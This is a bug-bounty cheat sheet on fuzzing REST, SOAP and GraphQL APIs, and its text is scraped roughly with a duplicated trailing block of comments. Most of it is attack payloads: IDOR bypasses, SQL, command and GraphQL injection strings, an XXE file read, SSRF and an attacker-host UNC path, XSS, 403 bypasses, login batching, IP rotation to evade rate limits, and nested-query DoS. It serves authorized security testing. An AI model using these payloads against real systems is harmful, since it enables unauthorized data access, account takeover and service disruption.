API Fuzzing for Bug Bounty Purpose Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors. Inputs/Prerequisites Burp Suite or similar proxy tool API wordlists (SecLists, api_wordlist) Understanding of REST/GraphQL/SOAP protocols Python for scripting Target API endpoints and documentation (if available) Outputs/Deliverables Identified API vulnerabilities IDOR exploitation proofs Authentication bypass techniques SQL injection points Unauthorized data access documentation API Types Overview Type Protocol Data Format Structure SOAP HTTP XML Header + Body REST HTTP JSON/XML/URL Defined endpoints GraphQL HTTP Custom Query Single endpoint Core Workflow Step 1: API Reconnaissance Identify API type and enumerate endpoints:

Check for Swagger/OpenAPI documentation

/swagger.json /openapi.json /api-docs /v1/api-docs /swagger-ui.html

Use Kiterunner for API discovery

kr scan https://target.com -w routes-large.kite

Extract paths from Swagger

python3 json2paths.py swagger.json Step 2: Authentication Testing

/api/mobile/login /api/v3/login /api/magic_link /api/admin/login

Check rate limiting on auth endpoints

If no rate limit → brute force possible

Test mobile vs web API separately

Don't assume same security controls

Step 3: IDOR Testing Insecure Direct Object Reference is the most common API vulnerability:

Basic IDOR

GET /api/users/1234 → GET /api/users/1235

Even if ID is email-based, try numeric

/?user_id

111 instead of /?user_id = user@mail.com

Test /me/orders vs /user/654321/orders

IDOR Bypass Techniques:

Wrap ID in array

{ "id" :111 } → { "id" : [ 111 ] }

JSON wrap

{ "id" :111 } → { "id" : { "id" :111 } }

Send ID twice

URL?id

< LEGIT

& id = < VICTIM

Wildcard injection

{ "user_id" : "*" }

Parameter pollution

/api/get_profile?user_id

< victim

& user_id = < legit

{ "user_id" : < legit_id

, "user_id" : < victim_id

} Step 4: Injection Testing SQL Injection in JSON: { "id" : "56456" } → OK { "id" : "56456 AND 1=1#" } → OK { "id" : "56456 AND 1=2#" } → OK { "id" : "56456 AND 1=3#" } → ERROR (vulnerable!) { "id" : "56456 AND sleep(15)#" } → SLEEP 15 SEC Command Injection:

Ruby on Rails

?url

Kernel

open → ?url=|ls

Linux command injection

api.url.com/endpoint?name

file.txt ; ls%20/ XXE Injection: <! DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]

SSRF via API: < object data = " http://127.0.0.1:8443 " /> < img src = " http://127.0.0.1:445 " /> .NET Path.Combine Vulnerability:

If .NET app uses Path.Combine(path_1, path_2)

Test for path traversal

https://example.org/download?filename

a.png https://example.org/download?filename = C: \ inetpub \ wwwroot \ web.config https://example.org/download?filename = \ \ smb.dns.attacker.com \ a.png Step 5: Method Testing

Test all HTTP methods

GET /api/v1/users/1 POST /api/v1/users/1 PUT /api/v1/users/1 DELETE /api/v1/users/1 PATCH /api/v1/users/1

Switch content type

Content-Type: application/json → application/xml GraphQL-Specific Testing Introspection Query Fetch entire backend schema: { __schema { queryType { name } , mutationType { name } , types { kind , name , description , fields ( includeDeprecated : true ) { name , args { name , type { name , kind } } } } } } URL-encoded version: /graphql?query={__schema{types{name,kind,description,fields{name}}}} GraphQL IDOR

Try accessing other user IDs

query { user ( id : "OTHER_USER_ID" ) { email password creditCard } } GraphQL SQL/NoSQL Injection mutation { login ( input : { email : " test' or 1=1-- " password : "password" } ) { success jwt } } Rate Limit Bypass (Batching) mutation { login ( input : { email : " a@example.com " password : "password" } ) { success jwt } } mutation { login ( input : { email : " b@example.com " password : "password" } ) { success jwt } } mutation { login ( input : { email : " c@example.com " password : "password" } ) { success jwt } } GraphQL DoS (Nested Queries) query { posts { comments { user { posts { comments { user { posts { ... } } } } } } } } GraphQL XSS

XSS via GraphQL endpoint

http://target.com/graphql?query

{ user ( name: "" ) { id } }

URL-encoded XSS

http://target.com/example?id

%C/script%E%Cscript%Ealert ( 'XSS' ) %C/script%E GraphQL Tools Tool Purpose GraphCrawler Schema discovery graphw00f Fingerprinting clairvoyance Schema reconstruction InQL Burp extension GraphQLmap Exploitation Endpoint Bypass Techniques When receiving 403/401, try these bypasses:

Original blocked request

/api/v1/users/sensitivedata → 403

Bypass attempts

/api/v1/users/sensitivedata.json /api/v1/users/sensitivedata? /api/v1/users/sensitivedata/ /api/v1/users/sensitivedata?? /api/v1/users/sensitivedata%20 /api/v1/users/sensitivedata%09 /api/v1/users/sensitivedata

/api/v1/users/sensitivedata & details /api/v1/users/ .. ; /sensitivedata Output Exploitation PDF Export Attacks

< iframe src = " file:///etc/passwd " height = 1000 width = 800

< object data = " http://127.0.0.1:8443 " />

< img src = " http://127.0.0.1:445 " />

< img src = " https://iplogger.com/yourcode.gif " /> DoS via Limits

Normal request

/api/news?limit

100

DoS attempt

/api/news?limit

9999999999 Common API Vulnerabilities Checklist Vulnerability Description API Exposure Unprotected endpoints exposed publicly Misconfigured Caching Sensitive data cached incorrectly Exposed Tokens API keys/tokens in responses or URLs JWT Weaknesses Weak signing, no expiration, algorithm confusion IDOR / BOLA Broken Object Level Authorization Undocumented Endpoints Hidden admin/debug endpoints Different Versions Security gaps in older API versions Rate Limiting Missing or bypassable rate limits Race Conditions TOCTOU vulnerabilities XXE Injection XML parser exploitation Content Type Issues Switching between JSON/XML HTTP Method Tampering GET→DELETE/PUT abuse Quick Reference Vulnerability Test Payload Risk IDOR Change user_id parameter High SQLi ' OR 1=1-- in JSON Critical Command Injection ; ls / Critical XXE DOCTYPE with ENTITY High SSRF Internal IP in params High Rate Limit Bypass Batch requests Medium Method Tampering GET→DELETE High Tools Reference Category Tool URL API Fuzzing Fuzzapi github.com/Fuzzapi/fuzzapi API Fuzzing API-fuzzer github.com/Fuzzapi/API-fuzzer API Fuzzing Astra github.com/flipkart-incubator/Astra API Security apicheck github.com/BBVA/apicheck API Discovery Kiterunner github.com/assetnote/kiterunner API Discovery openapi_security_scanner github.com/ngalongc/openapi_security_scanner API Toolkit APIKit github.com/API-Security/APIKit API Keys API Guesser api-guesser.netlify.app GUID GUID Guesser gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 GraphQL InQL github.com/doyensec/inql GraphQL GraphCrawler github.com/gsmith257-cyber/GraphCrawler GraphQL graphw00f github.com/dolevf/graphw00f GraphQL clairvoyance github.com/nikitastupin/clairvoyance GraphQL batchql github.com/assetnote/batchql GraphQL graphql-cop github.com/dolevf/graphql-cop Wordlists SecLists github.com/danielmiessler/SecLists Swagger Parser Swagger-EZ rhinosecuritylabs.github.io/Swagger-EZ Swagger Routes swagroutes github.com/amalmurali47/swagroutes API Mindmap MindAPI dsopas.github.io/MindAPI/play JSON Paths json2paths github.com/s0md3v/dump/tree/master/json2paths Constraints Must: Test mobile, web, and developer APIs separately Check all API versions (/v1, /v2, /v3) Validate both authenticated and unauthenticated access Must Not: Assume same security controls across API versions Skip testing undocumented endpoints Ignore rate limiting checks Should: Add X-Requested-With: XMLHttpRequest header to simulate frontend Check archive.org for historical API endpoints Test for race conditions on sensitive operations Examples Example 1: IDOR Exploitation

Original request (own data)

GET /api/v1/invoices/12345 Authorization: Bearer < token

Modified request (other user's data)

GET /api/v1/invoices/12346 Authorization: Bearer < token

Response reveals other user's invoice data

Example 2: GraphQL Introspection curl -X POST https://target.com/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{__schema{types{name,fields{name}}}}"}' Troubleshooting Issue Solution API returns nothing Add X-Requested-With: XMLHttpRequest header 401 on all endpoints Try adding ?user_id=1 parameter GraphQL introspection disabled Use clairvoyance for schema reconstruction Rate limited Use IP rotation or batch requests Can't find endpoints Check Swagger, archive.org, JS files

安装

Check for Swagger/OpenAPI documentation

Use Kiterunner for API discovery

Extract paths from Swagger

Test different login paths

Check rate limiting on auth endpoints

If no rate limit → brute force possible

Test mobile vs web API separately

Don't assume same security controls

Basic IDOR

Even if ID is email-based, try numeric

/?user_id

Test /me/orders vs /user/654321/orders

Wrap ID in array

JSON wrap

Send ID twice

URL?id

Wildcard injection

Parameter pollution

/api/get_profile?user_id

Ruby on Rails

?url

open → ?url=|ls

Linux command injection

api.url.com/endpoint?name

If .NET app uses Path.Combine(path_1, path_2)

Test for path traversal

https://example.org/download?filename

Test all HTTP methods

Switch content type

Try accessing other user IDs

XSS via GraphQL endpoint

http://target.com/graphql?query

URL-encoded XSS

http://target.com/example?id

Original blocked request

Bypass attempts

Normal request

/api/news?limit

DoS attempt

/api/news?limit

Original request (own data)

Modified request (other user's data)

Response reveals other user's invoice data